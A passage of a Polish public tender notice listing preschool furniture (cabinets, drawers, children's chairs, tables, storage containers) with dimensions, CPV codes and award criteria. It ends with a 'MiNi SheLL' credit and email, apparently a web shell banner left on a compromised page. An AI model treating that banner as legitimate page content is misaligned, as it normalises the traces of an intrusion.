- lewa, 1 szt; • wym.ok. 116,6 x 41,5 x 41 cm; • mała półka w komplecie; • - wąska szafka wisząca z półką, 1 szt; • wym.ok. 79,2 x 41,5 x 41 cm; • - wąska szafka wisząca z przegrodą, 1 szt;• wym. ok. 79,2 x 41,5 x 41 cm• - szafka S na 4 szuflady na cokole, 2 szt• wym.ok. 79,2 x 41,5 x 49,4 cm• - regał M z 2 przegrodami i półką, 1 szt• wym. ok. 116,6 x 41,5 x 86,8 cm• - szuflada wąska środkowa - biała, 1 szt• wym. frontu ok. 37 x 18,3 cm• - szuflada wąska środkowa - niebieska, 1 szt• wym. frontu ok. 37 x 18,3 cm• - szuflada wąska - biała, 2 szt• wym. frontu ok. 37 x 18,3 cm• - szuflada wąska - błękitna, 4 szt• wym. frontu ok. 37 x 18,3 cm• - szuflada wąska - niebieska, 2 szt• wym. frontu ok. 37 x 18,3 cm•- szuflada wąska - szara, 4 szt• wym. frontu 37 x 18,3 cm• - drzwiczki małe 90 - białe, 5 szt• wym. ok. 37 x 37 cm• - małe drzwiczk 90, mocowane do przegrody - szare, 1 szt• wym. ok.37 x 37 cm2	Ławeczka typu Quadro	1	szt.	Ławeczka typu Quadro na 3 małe skrzynie wykonana z płyty laminowanej w tonacji klonu o gr. 18 mm.Ławeczkę można uzupełnić skrzyniami małymi lub dużymi• wym. ok. 116,6 x 41,5 x 49,4 cm3	Mała skrzynia do ławeczeki typu Quadro	3	szt.	Pojemne skrzynie wyposażone w kółka ułatwiające wysuwanie. Wykonane z białej płyty laminowanej o gr. ok. 18 mm, front wykonany z płyty o gr. 18 mm pokrytej trwałą okleiną termoplastyczną.• wym. frontu ok. 37 x 37 cm• wym. wewn. ok. 34 x 32,5 x 28 cm. Kolory frontu: 1xbłękitny,1xlimonka,1x szary4	Szafka na plastikowe pojemniki z 2 przegrodami 1	szt.	Szafka typu S Quadro z przeznaczeniem na plastikowe pojemniki. Wykonana z płyty laminowanej w tonacji klonu o gr. ok. 18 mm. Wym. ok. 70,2x48x86,8 cm5	Szafka S na plastikowe pojemniki z 2 przegrodami 1	szt.	Szafka typu S Quadro z przeznaczeniem na plastikowe pojemniki. Wykonana z płyty laminowanej w tonacji klonu o gr. 18 mm. Wym. ok. 70,2x48x49,4 cm6	Biurko typu Quadro	1	szt.	Biurko z szafką i jedną szufladą; skrzynia klon , fronty szare wykonanej z foliowanej płyty MDF o grubości 18 mm; wym. ok. 120 x 60 x76 cm; wym. frontu szuflady ok. 37 x 18,3 cm; wym. Szuflady wew. ok. 32 x 43 x 9 cm.; wym. Frontu szafki ok. 37 x 37 cm. ; wym wew. szafki ok. 37 x37 x49 cm. 7	Biblioteczka typu Quadro	1	szt.	Biblioteczka służąca do ekspozycji książek w taki sposób, by były widoczne ich okładki. Wykonana z płyty laminowanej o gr. 18 mm, w tonacji klonu, oraz z płyty o gr. 18 mm pokrytej trwałą okleiną termoplastyczną. kolor limonkowy• wym. ok. 60 x 35 x 89 cm• 5 półek (szerokość ok.: 4 cm)8	Zestaw typu 31,90 st	1	szt.	Szafka zawiera zarówno szuflady jak i zamykane półki co daje możliwość przechowywania różnorodnych materiałów dydaktycznych czy zabawek. Fronty szafki mają biały kolor, który świetnie komponuje się z drzwiczkami w kolorze optymistycznej limonki. Korpus regału ma kolor naturalnego klonu. Skrzynia to płyta laminowana o gr. 18 mm. Fronty o gr. 18 mm pokryte zostały trwałą okleiną termoplastyczną i nie wymagają dodatkowego obrzeża. Chowane uchwyty dodają uroku regałom, ale są także bezpieczne w użytkowaniu przez małe dzieci w przedszkolu czy szkole. Wymiary zestawu: ok. 79,2 x 41,5 x 124,2 cm. Skład zestawu: - regał L z przegrodą i 2 półkami, 1 szt.• wym. ok. 79,2 x 41,5 x 124,2 cm, Półki - 2 szt., 1 kpl.• wym. ok. 36,5 x 37 cm, - szuflada wąska - biała, 4 szt.• wym. ok. frontu 37 x 18,3 cm, - drzwiczki średnie 90 - białe, 1 szt.• wym. ok. 37 x 74,4 cm, - drzwiczki średnie 90 - limonkowe, 1 szt.• wym. ok. 37 x 74,4 cm • wym. ok. 79,2 x 41,5 x 161,6 cm9	Szuflady typu Quadro 61, 90st.	1	szt.	Skład zestawu: typu Quadro - szafka asymetryczna M na szerokie szuflady, klonowa 1 szt• wym. ok. 116,6 x 41,5 x 86,8 cm• - drzwiczki małe 90 - szare, 1 szt• wym. ok. 37 x 37 cm• - drzwiczki małe 90 - limonkowe, 1 szt• wym. ok. 37 x 37 cm•- szuflada szeroka - biała, 2 szt• wym. frontu ok. 75,2 x 18,3 cm• - szuflada szeroka - szara, 1 szt• wym. frontu ok. 75,2 x 18,3 cm•- szuflada szeroka - limonkowa, 1 szt10	Szafa ubrabiowa mała typu Prima NB 4042	1	szt.	Szafa ubraniowa mała(drążek na wieszaki, wymiary ok. 46x40x190(jedna półka na dole i jedna nad wieszakiem), kolor brzoza11	Regał typu Prima NB 2012	1	szt.	Regał o wym. ok. 90x40x190 z półkami i na dole parą drzwi małych; kolor buk, płyta laminowana12	Regał typu Prima NB 2032	1	szt.	Regał z dużymi drzwiami, kolor buk, wymiary ok. wys.190,szer.90,gł. 40 z dużymi drzwiami 3/4 wysokości, jedna półką nad drzwiami13	Regał typu Prima NB 2112	1	szt.	Regał z dwoma parami drzwi małych wymiary ok.: wys.190,szer.90, gł. 40,kolor buk(pomiędzy drzwiczkami jedna półka)14	Stół konferencyjny typu Prima NB 5002	1	szt.	Stół na 6-8 osób, wymiary ok. 70x80x73 cm., kolor brzoza15	Krzesło przedszkolne typu motylek	3	szt.	Lekkie krzesełko z tworzywa sztucznego. Lekko sprężyste oparcie, otwór między oparciem a wyprofilowanym siedziskiem oraz właściwości tworzywa, z którego są wykonane pomagają korygować postawę dziecka oraz utrzymać kręgosłup we właściwym ułożeniu. Krzesełka są łatwe do przenoszenia i przechowywania, można nakładać je na siebie, kolor czerwony -(wys.2 - siedzisko ok. 30 cm, całkowita ok.55 cm). 16	Krzesło przedszkolne typu motylek	3	szt.	Lekkie krzesełko z tworzywa sztucznego. Lekko sprężyste oparcie, otwór między oparciem a wyprofilowanym siedziskiem oraz właściwości tworzywa, z którego są wykonane pomagają korygować postawę dziecka oraz utrzymać kręgosłup we właściwym ułożeniu. Krzesełka są łatwe do przenoszenia i przechowywania, można nakładać je na siebie, kolor zielony -(wys.3 - siedzisko ok. 35 cm, całkowita ok. 63 cm). 17	Pojemniki typu Gratnells 4	szt.	Pojemniki z wytrzymałego tworzywa sztucznego, pasujące do szafek typu Sanlandia, Flexi, Quadro i Grande. Dostarczane z prowadnicami. Kolor żółty• wym. ok. 31,2 x 42,7 x 7,5 cm 18	Pojemniki typu Gratnells 2	szt.	Pojemnik z wytrzymałego tworzywa sztucznego, pasujący do szafek typu Sanlandia, Flexi, Quadro i Grande. Dostarczany z prowadnicami. Kolor limonkowy• wym. ok. 31,2 x 42,7 x 15 cm 19	Pojemniki typu Gratnells 2	szt.	Pojemnik z wytrzymałego tworzywa sztucznego, pasujący do szafek typu Sanlandia, Flexi, Quadro i Grande. Dostarczany z prowadnicami. Kolor transparentny• wym. ok. 31,2 x 42,7 x 15 cm 20	Pojemniki typu Gratnells 4	szt.	Pojemnik z wytrzymałego tworzywa sztucznego, pasujący do szafek typu Sanlandia, Flexi, Quadro i Grande. Dostarczany z prowadnicami. Kolor transparentny• wym. ok. 31,2 x 42,7 x 30cm 21	Półki na kubki 4	szt.	Półka wykonana z laminowanej płyty o grubości 18 mm w tonacji klonu. Zawiera miejsce na 4 kubeczki z akcesoriami• wym. ok. 31 x 15,2 x 46,4 cm 22	Kanapy z podłokietnikami 2	szt.	Kanapa z pianki, pokryta wytrzymałą tkaniną PCV, łatwą do utrzymania w czystości. Tkanina nie zawiera ftalanów. 1 szt. kolor niebeski i 1 szt. kolor zielony• wym. ok. 98 x 39 x 45 cm23	Stolik motylek dla dzieci typu wyspa	1	szt.	Komfortowe stoliki dla dzieci wyróżniają się praktyczną formą oraz eleganckim kształtem . Solidny zaokraglony blat i łagodne krawędzie gwarantują bezpiczeństwo dzieci nawet w trakcie emocjonującej pracy twórczej . Blaty wykonane są z tworzywa sztucznego wzmocnionego metalową ramą oraz metalowymi nogami o regulowanej wysokości (40-60 cm). Nierysująca antypoślizgowa stopka. Wym. ok. 105x150 cm24	Stolik motylek dla dzieci typu prostokąt	1	szt.	Komfortowe stoliki dla dzieci wyróżniają się praktyczną formą oraz eleganckim kształtem . Solidny zaokraglony blat i łagodne krawędzie gwarantują bezpiczeństwo dzieci nawet w trakcie emocjonującej pracy twórczej . Blaty wykonane są z tworzywa sztucznego wzmocnionego metalową ramą oraz metalowymi nogami o regulowanej wysokości (40-60 cm). Nierysująca antypoślizgowa stopka. Wym. ok. 62x122 cm25	Krzesło obrotowe	2	szt.	Wyposażone w wysokie, ergonomicznie wyprofilowane oparcie, zapewniające optymalne wsparcie dla kręgosłupa. Regulowana wysokość. Krzesło na kółkach. Materiał: 100% włókno syntetyczne.• śr. ok. 63 cm• wys. ok. siedziska 42,5-55,5 cm 26	Stoliki typu FLEXI 4	szt.	Stoliki typu FLEXI 2szt. x okrągły, blat żółty; 1szt.x okrągły, blat niebieski; 1szt.x okrągły, blat zielony. Bardzo wytrzymałe stoły, wykonane ze sklejki o grubości ok.25 mm, z kolorowym laminatem HPL, który cechuje: odporność na zarysowania i uderzenia, wysoka odporność na wilgoć, czynniki chemiczne, wysoką temperaturę, gładka i nieporowata powierzchnia – łatwa do czyszczenia, antystatyczność, odporność na zabrudzenia. Rogi blatów delikatnie zaokrąglone. Nogi okrągłe o śr.ok. 55 mm, z regulacją wysokości: min. 40, 46, 52, 58 cm. Zgodne z normą PN-EN 1729-1:2016, PN-EN 1729-2+A1:2016, PN-F-06009:200127	Krzesełko drewniane typu Filipek	11	szt.	Krzesła wykonane z lakierowanej sklejki bukowej o gr. ok. 6 mm. Stelaż wykonany z profilu drewnianego o przekroju ok. 22 x 45 mm. Wyprofilowane siedzisko eliminuje ucisk pod kolanami w trakcie siedzenia, a wygodne oparcie zapewnia właściwą postawę ciała. Płyta siedziska umieszczona pomiędzy elementami konstrukcyjnymi stelaża. Solidna, drewniana konstrukcja zapewnia stabilność. Stopki z tworzywa lub filcu chronią podłogę przed zarysowaniem. Krzesła można stawiać jedno na drugim. Zgodne z normą PN-EN 1729-1:2016-2 oraz PN-EN 1729-2+A1:2016-2. • wymiar siedziska: ok. 32 x 25,5 cm (rozmiar 1) kolor naturalny28	Krzesełko drewniane typu Filipek	4	szt.	Krzesła wykonane z lakierowanej sklejki bukowej o gr. ok. 6 mm. Stelaż wykonany z profilu drewnianego o przekroju ok. 22 x 45 mm. Wyprofilowane siedzisko eliminuje ucisk pod kolanami w trakcie siedzenia, a wygodne oparcie zapewnia właściwą postawę ciała. Płyta siedziska umieszczona pomiędzy elementami konstrukcyjnymi stelaża. Solidna, drewniana konstrukcja zapewnia stabilność. Stopki z tworzywa lub filcu chronią podłogę przed zarysowaniem. Krzesła można stawiać jedno na drugim. Zgodne z normą PN-EN 1729-1:2016-2 oraz PN-EN 1729-2+A1:2016-2. • wymiar siedziska: ok. 33 x 29 cm (rozmiar 2) kolor naturalny<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39161000-8, 39150000-8<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-02-07<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Aspekty społeczne</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin płatności faktury </td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com